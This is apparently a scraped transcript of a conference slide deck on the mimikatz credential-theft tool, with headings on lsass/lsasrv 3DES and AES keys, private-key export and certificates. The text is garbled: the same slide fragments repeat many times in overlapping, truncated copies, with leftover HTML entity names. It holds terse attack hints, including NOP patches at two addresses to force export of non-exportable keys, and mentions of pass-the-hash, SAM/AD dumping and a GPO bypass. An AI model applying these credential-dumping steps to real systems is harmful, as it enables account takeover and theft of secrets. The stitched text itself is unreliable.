mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )








ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )







Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )































bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )











ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )













Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )
















Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )











text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )





























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )













Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )

















ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )


















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )

















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )













Questions

Donrsquot be shy )






mimikatz @ asfws - Gentil Kiwi · 2014. 8. 21. · mimikatz working On XP, 2003, Vista, 2008,...

Documents

Transcript of mimikatz @ asfws - Gentil Kiwi · 2014. 8. 21. · mimikatz working On XP, 2003, Vista, 2008,...